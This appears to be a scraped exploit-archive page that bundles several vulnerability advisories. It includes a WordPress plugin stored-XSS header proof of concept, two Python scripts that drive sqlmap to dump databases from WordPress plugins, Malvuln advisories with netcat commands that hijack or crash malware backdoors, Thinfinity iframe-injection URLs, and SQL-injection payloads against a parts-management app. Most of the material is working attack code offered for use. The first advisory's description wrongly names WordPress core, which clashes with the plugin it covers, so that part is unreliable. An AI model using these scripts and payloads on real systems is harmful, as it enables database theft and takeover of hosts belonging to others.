<pre><code>Hello, today I disclosed the CVE-2021-25080 vulnerability. Here attached<br />technical information:<br /><br /># References:<br />* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac<br />*<br />https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/<br /><br /><br /># Description:<br />WordPress before 5.2.3 allows XSS in post previews by authenticated users.<br /><br /><br /><br /><br /># Technical Details and Exploitation:<br />CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.<br />When the user uploads a new form, CRM Form Entries checks for the client IP<br />in order to save information about the user:<br />===============================================================================================================<br />public function get_ip(),<br />wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388<br />==============================================================================================================<br />The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is<br />stored inside the database.<br /><br /><br /># Proof Of Concept:<br /><br />Suppose that you have a Contact Form, intercept the POST request and insert<br />the following Client-IP header<br />===============================================================================================================<br />POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback<br />HTTP/1.1<br />Host: dsp.com:11080<br />Content-Length: 1411<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...<br />Client-IP: <img src=a onerror=alert(1)><br /><br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br /><br />Content-Disposition: form-data; name="_wpcf7"<br /><br />10<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_version"<br /><br />5.3.1<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_locale"<br /><br />en_US<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_unit_tag"<br /><br />wpcf7-f10-p13-o1<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_container_post"<br /><br />Content-Disposition: form-data; name="_wpcf7"<br /><br />10<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_version"<br /><br />5.3.1<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_locale"<br /><br />en_US<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_unit_tag"<br /><br />wpcf7-f10-p13-o1<br />------WebKitFormBoundaryCuNGXLnhRsdglEAx<br />Content-Disposition: form-data; name="_wpcf7_container_post"<br />...<br />===============================================================================================================<br />The request is acccepted, and the code navigates the section<br />$_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database.<br />When the administrator clicks on the entry element in the plugin, the XSS<br />is triggered.<br /><br /><br /># Solution:<br />Upgrade Contact Form Entries to version 1.1.7<br /><br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)<br /># Date 18.02.2022<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://www.getperfectsurvey.com/<br /># Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip<br /># Version: < 1.5.2<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2021-24762<br /># CWE: CWE-89<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md<br /><br />'''<br />Description:<br />The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before<br />using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.<br />'''<br /><br />banner = '''<br /> <br /> ___ _ _ ______ ____ ____ ____ ___ ____ _ _ _______ _____ ____ <br /> _(___)_ (_) (_)(______) _(____) (____) _(____) (___) _(____)(_) (_)(_______)(_____) _(____) <br />(_) (_)(_) (_)(_)__ ______(_) _(_)(_) (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___ (_) _(_) <br />(_) _ (_) (_)(____)(______) _(_) (_) (_) _(_) (_)(______) _(_) (________)_(_) (_____)_ _(_) <br />(_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___ (_) (_)___ (_) (_) (_)___(_)(_)___ <br /> (___) (___) (______) (______) (____) (______) (_) (______) (_)(_) (_____)(______) <br /> <br /> <br /> [+] Perfect Survey - SQL Injection<br /> [@] Developed by Ron Jost (Hacker5preme)<br /><br />'''<br />print(banner)<br /><br />import argparse<br />from datetime import datetime<br />import os<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br />target_port = args.PORT<br />wp_path = args.PATH<br /><br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br />print('[*] Payload for SQL-Injection:')<br />exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" '<br />print(' Sqlmap options:')<br />print(' -a, --all Retrieve everything')<br />print(' -b, --banner Retrieve DBMS banner')<br />print(' --current-user Retrieve DBMS current user')<br />print(' --current-db Retrieve DBMS current database')<br />print(' --passwords Enumerate DBMS users password hashes')<br />print(' --tables Enumerate DBMS database tables')<br />print(' --columns Enumerate DBMS database table column')<br />print(' --schema Enumerate DBMS schema')<br />print(' --dump Dump DBMS database table entries')<br />print(' --dump-all Dump all DBMS databases tables entries')<br />retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')<br />exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0'<br />os.system(exploitcode)<br />print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /> <br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a7ce38e60cf08f2b234f34043b87e701.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.SilentSpy.10<br />Vulnerability: Authentication Bypass Command Execution<br />Description: The malware listens on TCP ports 21, 7007. Third-party attackers who can reach an infected system can change the server password on the fly using the !SETSERVPASS! command, logon and run commands made available by the malware.<br />Type: PE32<br />MD5: a7ce38e60cf08f2b234f34043b87e701<br />Vuln ID: MVID-2021-0440<br />Disclosure: 12/31/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 7007<br />!SETSERVPASS! abc123<br />!STATUS!Server password has been changed<br /><br />!PASS! abc123<br />!PASSOK!!STATUS!Connnected to º∩LΘn7 ºp<br /><br />!SYMBOL!<br />!STATUS!Symbol has been drawn<br /><br />!SETSERVNAME! HATE<br />!STATUS!Server name has been changed<br /><br />nc64.exe x.x.x.x 7007<br />!PASS! abc123<br />!PASSOK!!STATUS!Connnected to HATE<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)<br /># Date 20.02.2022<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://wedevs.com/<br /># Software Link: https://downloads.wordpress.org/plugin/wp-user-frontend.3.5.25.zip<br /># Version: < 3.5.25<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2021-25076<br /># CWE: CWE-89<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-25076/README.md<br /><br />'''<br />Description:<br />The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter<br />before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection.<br />Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting<br />'''<br /><br />banner = '''<br /><br /> _|_|_| _| _| _|_|_|_| _|_| _| _|_| _| _|_| _|_|_|_| _| _|_|_|_|_| _|_|_| <br />_| _| _| _| _| _| _| _| _| _| _|_| _| _| _| _| _| _| _| <br />_| _| _| _|_|_| _|_|_|_|_| _| _| _| _| _| _|_|_|_|_| _| _|_|_| _| _| _| _|_|_| <br />_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| <br /> _|_|_| _| _|_|_|_| _|_|_|_| _| _|_|_|_| _| _|_|_|_| _|_|_| _| _| _|_| <br /> <br /> [+] WP User Frontend - SQL Injection<br /> [@] Developed by Ron Jost (Hacker5preme)<br />'''<br />print(banner)<br /><br />import argparse<br />from datetime import datetime<br />import os<br />import requests<br />import json<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description= 'WP User Frontend - SQL-Injection (Authenticated)')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />my_parser.add_argument('-u', '--USERNAME', type=str)<br />my_parser.add_argument('-p', '--PASSWORD', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br />target_port = args.PORT<br />wp_path = args.PATH<br />username = args.USERNAME<br />password = args.PASSWORD<br /><br /><br /><br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /><br /># Authentication:<br />session = requests.Session()<br />auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'<br />check = session.get(auth_url)<br /># Header:<br />header = {<br /> 'Host': target_ip,<br /> 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br /> 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Origin': 'http://' + target_ip,<br /> 'Connection': 'close',<br /> 'Upgrade-Insecure-Requests': '1'<br />}<br /><br /># Body:<br />body = {<br /> 'log': username,<br /> 'pwd': password,<br /> 'wp-submit': 'Log In',<br /> 'testcookie': '1'<br />}<br />auth = session.post(auth_url, headers=header, data=body)<br /><br /># SQL-Injection (Exploit):<br /># Generate payload for sqlmap<br />cookies_session = session.cookies.get_dict()<br />cookie = json.dumps(cookies_session)<br />cookie = cookie.replace('"}','')<br />cookie = cookie.replace('{"', '')<br />cookie = cookie.replace('"', '')<br />cookie = cookie.replace(" ", '')<br />cookie = cookie.replace(":", '=')<br />cookie = cookie.replace(',', '; ')<br />print('[*] Payload for SQL-Injection:')<br />exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=1" '<br />exploitcode_risk = '--level 2 --risk 2 '<br />exploitcode_cookie = '--cookie="' + cookie + '" '<br />print(' Sqlmap options:')<br />print(' -a, --all Retrieve everything')<br />print(' -b, --banner Retrieve DBMS banner')<br />print(' --current-user Retrieve DBMS current user')<br />print(' --current-db Retrieve DBMS current database')<br />print(' --passwords Enumerate DBMS users password hashes')<br />print(' --tables Enumerate DBMS database tables')<br />print(' --columns Enumerate DBMS database table column')<br />print(' --schema Enumerate DBMS schema')<br />print(' --dump Dump DBMS database table entries')<br />print(' --dump-all Dump all DBMS databases tables entries')<br />retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')<br />exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p status -v 0 --answers="follow=Y" --batch'<br />os.system(exploitcode)<br />print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /> <br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/d724feed69ec7b624e4e178ad6579cfb.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Skrat<br />Vulnerability: Cleartext Hardcoded Password<br />Description: SKD RAT malware has feature to build backdoor servers, when setting a password for remote access the malware hardcodes the password in cleartext within the executable when built.<br />Type: PE32<br />MD5: d724feed69ec7b624e4e178ad6579cfb<br />Vuln ID: MVID-2021-0437<br />Dropped files: server.exe<br />Disclosure: 12/31/2021<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Exploit Title: Thinfinity VirtualUI 2.5.26.2 - Information Disclosure<br />Date: 18/01/2022<br />Exploit Author: Daniel Morales<br />Vendor: https://www.cybelesoft.com <https://www.cybelesoft.com/><br />Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ <https://www.cybelesoft.com/thinfinity/virtualui/><br />Version vulnerable: Thinfinity VirtualUI < v2.5.26.2<br />Tested on: Microsoft Windows<br />CVE: CVE-2021-46354<br /><br />How it works<br />External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to filtrate the real IP of the webserver or increase the attack surface (it may be used also to filtrate the real IP behind a CDN).<br /><br />Payload<br />An example of the HTTP request "https://example.com/cmd <https://example.com/cmd>?<br />cmd=connect&wscompression=true&destAddr=domain.com <http://domain.com/><br />&scraper=fmx&screenWidth=1918&screenHeight=934&fitmode=0&argumentsp=&orientation=0&browserWidth=191<br />8&browserHeight=872&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supp<br />ortsFullScreen=true&webapp=false” <br /><br />Where "domain.com <http://domain.com/>" is the external endpoint to be requested.<br /><br />Vulnerable versions<br />It has been tested in VirtualUI version 2.1.28.0, 2.1.32.1 and 2.5.26.2<br /><br />References<br />https://github.com/cybelesoft/virtualui/issues/3 <https://github.com/cybelesoft/virtualui/issues/3><br />https://www.tenable.com/cve/CVE-2021-46354 <https://www.tenable.com/cve/CVE-2021-46354><br />https://twitter.com/danielmofer <https://twitter.com/danielmofer><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a1d045151c809535a308311931588fd0.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Fantador<br />Vulnerability: Divide by Zero DoS<br />Description: The malware allows you to configure an port for the FTP server, so you would need to know the port up front. Third-party attackers can send a junk payload triggering a Divide by Zero DoS condition and crash the server.<br />Type: PE32<br />MD5: a1d045151c809535a308311931588fd0<br />Vuln ID: MVID-2021-0438 <br />Disclosure: 12/31/2021<br /><br />Memory Dump:<br />(e80.6d0): Integer divide-by-zero - code c0000094 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=00000003 edi=00000003<br />eip=773ced3c esp=0019f1e0 ebp=0019f370 iopl=0 nv up ei pl nz ac po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />773ced3c c21400 ret 14h<br />0:000> .ecxr<br />eax=000001f4 ebx=00000000 ecx=00000000 edx=00000000 esi=041c18c8 edi=00000000<br />eip=0040ece7 esp=0019fb64 ebp=00000000 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Fantador.a1d045151c809535a308311931588fd0.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Fantador.a1d045151c809535a308311931588fd0.exe<br />Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+0xece7:<br />0040ece7 f7f1 div eax,ecx<br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br /><br />FAULTING_IP: <br />Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+ece7<br />0040ece7 f7f1 div eax,ecx<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 0040ece7 (Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+0x0000ece7)<br /> ExceptionCode: c0000094 (Integer divide-by-zero)<br /> ExceptionFlags: 00000000<br />NumberParameters: 0<br /><br />PROCESS_NAME: Backdoor.Win32.Fantador.a1d045151c809535a308311931588fd0.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000094 - {EXCEPTION} Integer division by zero.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000094 - {EXCEPTION} Integer division by zero.<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 000006d0<br /><br />DEFAULT_BUCKET_ID: STATUS_INTEGER_DIVIDE_BY_ZERO<br /><br />PRIMARY_PROBLEM_CLASS: STATUS_INTEGER_DIVIDE_BY_ZERO<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STATUS_INTEGER_DIVIDE_BY_ZERO<br /><br />LAST_CONTROL_TRANSFER: from 00000000 to 0040ece7<br /><br />STACK_TEXT: <br />00000000 00000000 00000000 00000000 00000000 Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+0xece7<br /><br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+ece7<br />0040ece7 f7f1 div eax,ecx<br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+ece7<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0<br /><br />IMAGE_NAME: Backdoor.Win32.Fantador.a1d045151c809535a308311931588fd0.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 3fe17f27<br /><br />STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb<br /><br />FAILURE_BUCKET_ID: STATUS_INTEGER_DIVIDE_BY_ZERO_c0000094_Backdoor.Win32.Fantador.a1d045151c809535a308311931588fd0.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STATUS_INTEGER_DIVIDE_BY_ZERO_Backdoor_Win32_Fantador_a1d045151c809535a308311931588fd0+ece7<br /><br /><br />Exploit/PoC:<br />python -c "print('A'*2839)" | nc64.exe x.x.x.x 21<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Exploit Title: Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection<br />Date: 16/12/2021<br />Exploit Author: Daniel Morales<br />Vendor: https://www.cybelesoft.com <https://www.cybelesoft.com/><br />Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ <https://www.cybelesoft.com/thinfinity/virtualui/><br />Version: Thinfinity VirtualUI < v3.0<br />Tested on: Microsoft Windows<br />CVE: CVE-2021-45092<br /><br />How it works<br />By accessing the following payload (URL) an attacker could iframe any external website (of course, only external endpoints that allows being iframed).<br /><br />Payload<br />The vulnerable vector is "https://example.com/lab.html?vpath=//wikipedia.com <https://example.com/lab.html?vpath=//wikipedia.com> " where "vpath=//" is the pointer to the external site to be iframed.<br /><br />Vulnerable versions<br />It has been tested in VirtualUI version 2.1.37.2, 2.1.42.2, 2.5.0.0, 2.5.36.1, 2.5.36.2 and 2.5.41.0.<br /><br />References<br />https://github.com/cybelesoft/virtualui/issues/2 <https://github.com/cybelesoft/virtualui/issues/2><br />https://www.tenable.com/cve/CVE-2021-45092 <https://www.tenable.com/cve/CVE-2021-45092><br />https://twitter.com/danielmofer <https://twitter.com/danielmofer><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a1d045151c809535a308311931588fd0_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Fantador <br />Vulnerability: Insecure Password Storage<br />Description: The malware has an FTP component that can be enabled. The credentials are stored in cleartext in a file named "Fantasy.ini".<br />Type: PE32<br />MD5: a1d045151c809535a308311931588fd0<br />Vuln ID: MVID-2021-0439<br />Disclosure: 12/31/2021<br /><br />Exploit/PoC:<br />Fantasy.ini<br /><br />[FTP Server]<br />Address=0.0.0.0<br />User Name=admin<br />FileName=<br />PASSWORD=abc123<br />[Set]<br />ListenPort=21<br />TimeFlash=0<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Auto-Spare-Parts-Management v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.19.2022<br />## Vendor: https://github.com/pavanpatil45<br />## Software: https://github.com/pavanpatil45/Auto-Spare-Parts-Management<br /><br /><br />## Description:<br />The Referer HTTP header on Auto-Spare-Parts-Management v1.0 system<br />appears to be vulnerable to SQL injection attacks, parameter `user`.<br />The payload ' was submitted in the Referer HTTP header, and a database<br />error message was returned.<br />The attacker from outside can take control of all accounts of this<br />system by using this vulnerability!<br />WARNING: If this is in some external domain, or some subdomain, or<br />internal, this will be extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: user (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: user=admin1' AND 5432=5432 AND<br />'MXPx'='MXPx&password=admin1&btnlogin=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: user=admin1' AND (SELECT 8861 FROM(SELECT<br />COUNT(*),CONCAT(0x71786b6271,(SELECT<br />(ELT(8861=8861,1))),0x71706b7171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND<br />'aOSP'='aOSP&password=admin1&btnlogin=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: user=admin1' AND (SELECT 1749 FROM<br />(SELECT(SLEEP(3)))XjEM) AND 'xoHI'='xoHI&password=admin1&btnlogin=<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/pavanpatil45/Auto-Spare-Parts-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/qq19po)<br /><br /><br /></code></pre>
